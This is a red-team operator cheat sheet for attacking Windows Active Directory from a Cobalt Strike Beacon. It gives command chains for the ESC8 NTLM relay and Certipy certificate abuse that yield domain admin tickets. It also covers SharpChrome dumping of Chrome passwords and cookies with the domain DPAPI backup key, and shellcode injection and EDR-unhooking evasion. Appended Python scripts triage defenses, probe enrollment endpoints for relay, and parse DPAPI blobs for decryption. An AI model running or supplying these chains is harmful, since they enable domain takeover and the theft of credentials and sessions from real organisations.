Seatbelt - host, user and remote enumeration

```
# Run all checks with full output
execute-assembly C:\SeatBelt.exe -group=all -full -outputfile="C:\Temp\SeatBelt-all.json"
# Run only user-related checks - returns things like Chrome data, DPAPI keys, IE tabs, Windows vault/credentials, etc.
execute-assembly C:\SeatBelt.exe -group=user -outputfile="C:\Temp\SeatBelt-user.json"
# Run only system-related checks - returns things like antivirus, AppLocker, env path/variables, local users/groups, WMI, Sysmon, UAC, etc.
execute-assembly C:\SeatBelt.exe -group=system -outputfile="C:\Temp\SeatBelt-system.json"
# Run only Chrome checks - returns bookmarks, history, presence
execute-assembly C:\SeatBelt.exe -group=chromium -outputfile="C:\Temp\SeatBelt-chrome.json"
# Run only remote-related checks - returns things like network shares, PuTTY sessions, RDP connections/settings, FileZilla, Windows firewall, etc.
execute-assembly C:\SeatBelt.exe -group=remote -outputfile="C:\Temp\SeatBelt-remote.json"
# Run only miscellaneous checks - returns things like Chrome data, logon events, LOLBAS, interesting files, downloads, PowerShell events, scheduled tasks, etc.
execute-assembly C:\SeatBelt.exe -group=misc -outputfile="C:\Temp\SeatBelt-misc.json"
```

.NET version of Sherlock.ps1 to look for missing KBs on Windows

AD CS - NTLM relay to web enrollment (ESC8)

```
# Find the AD CS web server and verify that web enrollment is enabled by browsing to the URL: ``
# Relay the coerced DC authentication to the enrollment endpoint and request a certificate from the DomainController template
python3 ntlmrelayx.py -t -smb2support -adcs -template DomainController
# Force coercion via PetitPotam from the Cobalt Strike Beacon - observe "Attack Success!!!" in the output if it worked
# The ntlmrelayx output will contain the base64 certificate of the target DC machine account
# Use Rubeus with that certificate to request a TGT for the DC machine account and escalate to Domain Admin
execute-assembly C:\Rubeus.exe asktgt /dc: /domain: /user:$ /ptt /certificate:
# Verify the asktgt command worked by doing an 'ls' on the DC
```

Defense Evasion - Shellcode injection techniques

Several methods are available, either built into Cobalt Strike or via BOFs:

- Spawn a beacon into an existing process
- Inject raw shellcode into an existing process
- Create the shellcode: Cobalt Strike -> Attacks -> Packages -> Windows Executable (S) -> Output = Raw -> creates the "beacon.bin" file
- Shellcode injection methods using Windows syscalls with ()
- ajpc500/BOFs - ETW patch for the current process
- Cobalt Strike's hail-mary unhooking function
- "This is a Beacon Object File to refresh DLLs and remove their hooks. The code is from Cylance's Universal Unhooking research"

Exploitation - DPAPI decryption and extraction on Windows systems

```
# Dump Chrome logins on the local system for the current user
execute-assembly C:\SharpChrome.exe logins /unprotect
# Dump Chrome cookies on the local system for the current user
execute-assembly C:\SharpChrome.exe cookies
# Dump Chrome cookies on the local system for a specific URL - /url: takes a regex, and ".*" matches every URL, so narrow it to the target site
# Output in JSON format to import into the "Cookie-Editor" browser extension
execute-assembly C:\SharpChrome.exe cookies /format:json /browser:chrome /url:".*"
# Dump Chrome login passwords on remote machines using the domain backup key (a local user password can also be used)
execute-assembly C:\SharpChrome.exe logins /pvk:key.pvk /server:
# Dump and decrypt Chrome user cookies and sessions on remote machines using the domain backup key (a local user password can also be used)
# Cookies can then be imported into Chrome/Firefox using the Cookie-Editor extension
execute-assembly C:\SharpChrome.exe cookies /pvk:key.pvk /server:
```

SharpWeb - Retrieve saved credentials in Chrome, Firefox and Edge

AD CS - Certipy through a SOCKS proxy

```
# First, start a SOCKS proxy in Cobalt Strike (or skip to the next step if you have an on-site Linux VM)
# Configure proxychains on the Kali/Linux VM to route traffic through the C2 (point it at the Beacon's SOCKS port)
# Find vulnerable certificate templates with Certipy through the proxy
proxychains certipy find -u -p 'PASSWORD' -dc-ip 10.100.32.200 -vulnerable -timeout 30
# Request a certificate for a vulnerable template through the proxy
proxychains certipy req -u -p 'PASSWORD' -dc-ip 10.100.32.200 -ca corp-DC-CA -target ca. -template VulnTemplate -debug -upn
# Authenticate with the output .pfx file to request a TGT for the DomainAdminAcc user
proxychains certipy auth -pfx DomainAdminAcc.pfx -username DomainAdminAcc -domain '' -dc-ip X.X.X.X
# The command outputs the NTLM hash of the target account together with a TGT for the user
# Alternatively, use the output certificate of the DomainAdminAcc account with Rubeus from the Beacon
execute-assembly C:\Rubeus.exe asktgt /user:DomainAdminAcc /certificate:DomainAdminAcc.pfx /ptt /domain: /dc:
# Verify the command was successful by doing an 'ls' on the DC
ls \\DomainController\c$
```

MalSCCM - Exploiting SCCM servers to deploy malicious applications
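The Seatbelt runs above write one JSON file per group, and on a busy host those files are too large to read by eye. The following is an added example (not from the original notes, and not Seatbelt's own code) that triages such a file for the controls that decide which injection or unhooking method to use. It assumes that with `-outputfile=<name>.json` Seatbelt writes one JSON object per line shaped `{"Type": "<DTO class>", "Data": {...}}`; the sample lines and their field names are constructed to match that shape, not real host output.

```python
# Added example: triage Seatbelt JSON output. Assumed format: one record per
# line, {"Type": "<DTO class name>", "Data": {...}}. Sample lines are constructed.
import json
from collections import Counter

CONSTRUCTED_SEATBELT_JSON = "\n".join([
    '{"Type":"Seatbelt.Commands.Windows.OSInfoCommand+OSInfoDTO",'
    '"Data":{"Hostname":"WS01","ProductName":"Windows 10 Enterprise",'
    '"IsHighIntegrity":false,"IsLocalAdmin":true}}',
    '{"Type":"Seatbelt.Commands.Windows.AntiVirusCommand+AntiVirusDTO",'
    '"Data":{"Engine":"Windows Defender","ProductEXE":"windowsdefender://",'
    '"ReportingEXE":"C:\\\\Program Files\\\\Windows Defender\\\\MsMpeng.exe"}}',
    '{"Type":"Seatbelt.Commands.Windows.SysmonCommand+SysmonDTO",'
    '"Data":{"Installed":true,"HashingAlgorithm":"SHA256"}}',
    '{"Type":"Seatbelt.Commands.Windows.AppLockerCommand+AppLockerDTO",'
    '"Data":{"AppIDSvcState":"Running","Rules":[{"Collection":"Exe","Enforcement":"Enabled"}]}}',
    "not json - progress text that leaked into the file",
    '{"Type":"Seatbelt.Commands.Windows.NetworkSharesCommand+NetworkSharesDTO",'
    '"Data":{"Name":"ADMIN$","Path":"C:\\\\Windows"}}',
])


def parse_seatbelt_json(text):
    """Return [(short_type, data), ...] for every well-formed record; skip the rest."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            obj = json.loads(line)
        except json.JSONDecodeError:
            continue  # tolerate non-JSON noise rather than abort the whole file
        if not (isinstance(obj, dict) and isinstance(obj.get("Type"), str) and "Data" in obj):
            continue
        # "Seatbelt.Commands.Windows.SysmonCommand+SysmonDTO" -> "Sysmon"
        short = obj["Type"].rsplit("+", 1)[-1]
        if short.endswith("DTO"):
            short = short[:-3]
        records.append((short, obj["Data"]))
    return records


def count_by_type(records):
    """How many records each check produced; a quick sanity check of coverage."""
    return Counter(short for short, _ in records)


def detection_posture(records):
    """Pull the controls that matter before picking an injection/unhooking method."""
    posture = {"av": [], "sysmon": False, "applocker_enforced": False,
               "local_admin": False, "high_integrity": False}
    for short, data in records:
        if not isinstance(data, dict):
            continue  # error records carry a string, not a DTO
        if short == "AntiVirus":
            posture["av"].append(data.get("Engine"))
        elif short == "Sysmon":
            posture["sysmon"] = bool(data.get("Installed"))
        elif short == "AppLocker":
            posture["applocker_enforced"] = any(
                rule.get("Enforcement") == "Enabled" for rule in data.get("Rules", []))
        elif short == "OSInfo":
            posture["local_admin"] = bool(data.get("IsLocalAdmin"))
            posture["high_integrity"] = bool(data.get("IsHighIntegrity"))
    return posture


if __name__ == "__main__":
    recs = parse_seatbelt_json(CONSTRUCTED_SEATBELT_JSON)
    print(count_by_type(recs))
    print(detection_posture(recs))
```

Point it at the `SeatBelt-system.json` and `SeatBelt-all.json` files pulled back from the target; the parser deliberately skips any line that is not a well-formed record so a truncated download or leaked console text does not stop the triage.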
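The PetitPotam -> ntlmrelayx `-adcs` chain above only works if the AD CS web enrollment endpoint answers with an NTLM challenge, and it is only straightforward when that challenge is offered over plain HTTP (over HTTPS the relay is stopped when Extended Protection for Authentication is enforced). The following is an added example, not from the original notes or from Impacket, that classifies an endpoint from its HTTP response. The hostnames and responses in `CONSTRUCTED` are made up for the demo; `probe()` is the only live part and is optional.

```python
# Added example: classify an AD CS web enrollment endpoint for NTLM relay (ESC8).
# Sample responses are constructed, not captured from a real CA.
import urllib.error
import urllib.request


def ntlm_offered(status, headers):
    """True if a 401 advertises NTLM or Negotiate (which carries NTLM) in WWW-Authenticate.

    headers is a list of (name, value) pairs because IIS sends the header once per scheme.
    """
    if status != 401:
        return False
    schemes = {value.split()[0].lower() for name, value in headers
               if name.lower() == "www-authenticate" and value.strip()}
    return bool(schemes & {"ntlm", "negotiate"})


def classify(url, status, headers):
    """Map a probe result to what it means for the relay."""
    if not ntlm_offered(status, headers):
        return "no NTLM challenge"      # Kerberos-only, Basic, or enrollment not installed
    if url.lower().startswith("https://"):
        return "ntlm over https"        # relay works only if EPA/channel binding is off
    return "ntlm over http"             # ESC8 candidate: relay the coerced DC auth here


def probe(url, timeout=5):
    """Live probe returning (status, [(header, value), ...]); a 401 is the expected answer."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, list(resp.headers.items())
    except urllib.error.HTTPError as err:  # 401/404 arrive as exceptions
        return err.code, list(err.headers.items())


# Constructed responses for the demo (hostnames are placeholders).
CONSTRUCTED = {
    "http://ca.corp.local/certsrv/":  (401, [("WWW-Authenticate", "Negotiate"),
                                             ("WWW-Authenticate", "NTLM")]),
    "https://ca.corp.local/certsrv/": (401, [("WWW-Authenticate", "NTLM")]),
    "http://web.corp.local/certsrv/": (404, []),
    "http://ca2.corp.local/certsrv/": (401, [("WWW-Authenticate", 'Basic realm="certsrv"')]),
}


def triage(results):
    """results: {url: (status, headers)} -> {url: verdict}."""
    return {url: classify(url, status, headers) for url, (status, headers) in results.items()}


if __name__ == "__main__":
    for url, verdict in triage(CONSTRUCTED).items():
        print(f"{verdict:18} {url}")
    # Live use, from the proxied Linux VM: triage({u: probe(u) for u in ["http://ca/certsrv/"]})
```

Run the live probe through the same SOCKS proxy used for Certipy; an `ntlm over http` verdict on `/certsrv/` is the target to pass to ntlmrelayx `-t`, while `no NTLM challenge` means the coercion will succeed but the relay will never receive a certificate.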
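The SharpChrome `/pvk:key.pvk` commands above work because Chrome's AES key (stored base64-encoded, prefixed with `DPAPI`, under `os_crypt.encrypted_key` in the `Local State` file) is a DPAPI blob bound to one of the user's master keys, and the domain backup key can decrypt any domain user's master key. Before pulling a backup key or a password it helps to know which master key, and which scope, a blob needs. The following is an added example, not from the original notes and not SharpChrome's or SharpDPAPI's code, that reads the blob header; the layout is the CryptProtectData blob format as parsed by tools such as Impacket's `dpapi.py`, and the Local State document and blob below are constructed with dummy ciphertext.

```python
# Added example: read the DPAPI blob header of Chrome's Local State key to find
# the master key GUID and scope. The sample Local State is constructed.
import base64
import json
import struct
import uuid

DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
CRYPTPROTECT_LOCAL_MACHINE = 0x4          # flag set on machine-scoped blobs
ALG_NAMES = {0x6610: "AES-256", 0x6603: "3DES", 0x800E: "SHA-512", 0x8004: "SHA-1"}


def _lp(buf, off):
    """Read a DWORD length-prefixed field; return (bytes, new_offset)."""
    (n,) = struct.unpack_from("<L", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n


def parse_dpapi_blob(blob):
    """Parse the header of a CryptProtectData blob (does not decrypt anything)."""
    version, provider, _mk_version, mk_guid = struct.unpack_from("<L16sL16s", blob, 0)
    if version != 1 or uuid.UUID(bytes_le=provider) != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob")
    off = 40
    (flags,) = struct.unpack_from("<L", blob, off); off += 4
    desc, off = _lp(blob, off)
    crypt_alg, _crypt_bits = struct.unpack_from("<LL", blob, off); off += 8
    _salt, off = _lp(blob, off)
    _hmac_key, off = _lp(blob, off)
    hash_alg, _hash_bits = struct.unpack_from("<LL", blob, off); off += 8
    _hmac2_key, off = _lp(blob, off)
    data, off = _lp(blob, off)
    _sign, off = _lp(blob, off)
    return {
        # GUID of the master key file under %APPDATA%\Microsoft\Protect\<SID>\
        "master_key_guid": str(uuid.UUID(bytes_le=mk_guid)),
        "scope": "machine" if flags & CRYPTPROTECT_LOCAL_MACHINE else "user",
        "description": desc.decode("utf-16-le").rstrip("\0"),
        "crypt_alg": ALG_NAMES.get(crypt_alg, hex(crypt_alg)),
        "hash_alg": ALG_NAMES.get(hash_alg, hex(hash_alg)),
        "ciphertext_len": len(data),
    }


def chrome_local_state_key_info(local_state_json):
    """Chrome stores base64("DPAPI" + blob) in os_crypt.encrypted_key."""
    raw = base64.b64decode(json.loads(local_state_json)["os_crypt"]["encrypted_key"])
    if not raw.startswith(b"DPAPI"):
        raise ValueError("encrypted_key does not carry the DPAPI prefix")
    return parse_dpapi_blob(raw[5:])


def _build_blob(mk_guid, flags=0, description="Constructed Local State key"):
    """Constructed, syntactically valid blob with dummy ciphertext (demo only)."""
    lp = lambda b: struct.pack("<L", len(b)) + b
    desc = (description + "\0").encode("utf-16-le")
    return (struct.pack("<L", 1) + DPAPI_PROVIDER_GUID.bytes_le
            + struct.pack("<L", 1) + uuid.UUID(mk_guid).bytes_le
            + struct.pack("<L", flags) + lp(desc)
            + struct.pack("<LL", 0x6610, 256) + lp(bytes(32)) + lp(b"")
            + struct.pack("<LL", 0x800E, 512) + lp(b"")
            + lp(bytes(48)) + lp(bytes(64)))


CONSTRUCTED_MASTER_KEY_GUID = "3ff51f9c-3a75-4c5a-8d8a-1b2c3d4e5f60"   # made up for the demo
CONSTRUCTED_LOCAL_STATE = json.dumps({"os_crypt": {"encrypted_key": base64.b64encode(
    b"DPAPI" + _build_blob(CONSTRUCTED_MASTER_KEY_GUID)).decode()}})

if __name__ == "__main__":
    print(chrome_local_state_key_info(CONSTRUCTED_LOCAL_STATE))
```

A `user`-scoped result names the master key file that the `/pvk` backup key (or the user's password) must unlock; a `machine`-scoped blob needs the machine's DPAPI key from LSA secrets instead, and no domain backup key will help. Once that key is decrypted, the `v10`-prefixed values in Chrome's cookie and login databases are AES-256-GCM ciphertexts under the recovered Local State key, which is what the SharpChrome `cookies` and `logins` commands above decrypt.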